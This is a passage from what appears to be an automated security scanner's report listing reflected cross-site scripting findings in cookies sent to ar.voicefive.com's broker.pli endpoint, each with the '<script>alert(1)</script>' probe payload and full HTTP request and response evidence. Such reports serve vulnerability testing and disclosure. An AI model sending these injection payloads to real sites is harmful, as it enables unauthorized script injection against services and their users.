Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&f54bf<script>alert(1)</script>340b005e8ea; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:47 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:47 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:47 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949587; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&f54bf<script>alert(1)</script>340b005e8ea', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/
...[SNIP]...
3.126. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 7c55c<script>alert(1)</script>0001538d7dc was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&7c55c<script>alert(1)</script>0001538d7dc; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&7c55c<script>alert(1)</script>0001538d7dc', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...
3.127. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload 5247f<script>alert(1)</script>be803c30b08 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&5247f<script>alert(1)</script>be803c30b08; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
u May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&5247f<script>alert(1)</script>be803c30b08', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&ini
...[SNIP]...
3.128. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 81a12<script>alert(1)</script>be61ae8b882 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&81a12<script>alert(1)</script>be61ae8b882; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:47 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:47 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:47 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949587; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&81a12<script>alert(1)</script>be61ae8b882' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...
3.129. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90452457 cookie is copied into the HTML document as plain text between tags. The payload 247c1<script>alert(1)</script>a0857f057ac was submitted in the ar_p90452457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&247c1<script>alert(1)</script>a0857f057ac; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:49 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949589; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
Exp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&247c1<script>alert(1)</script>a0857f057ac', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...
3.130. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91136705 cookie is copied into the HTML document as plain text between tags. The payload a9998<script>alert(1)</script>065e4369a02 was submitted in the ar_p91136705 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&a9998<script>alert(1)</script>065e4369a02; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&a9998<script>alert(1)</script>065e4369a02', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...
3.131. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload 6dbcb<script>alert(1)</script>b29b024f0ca was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&6dbcb<script>alert(1)</script>b29b024f0ca; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:47 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:47 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:47 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949587; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&6dbcb<script>alert(1)</script>b29b024f0ca', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...
3.132. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p92429851 cookie is copied into the HTML document as plain text between tags. The payload 27999<script>alert(1)</script>2c482b2dc1b was submitted in the ar_p92429851 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
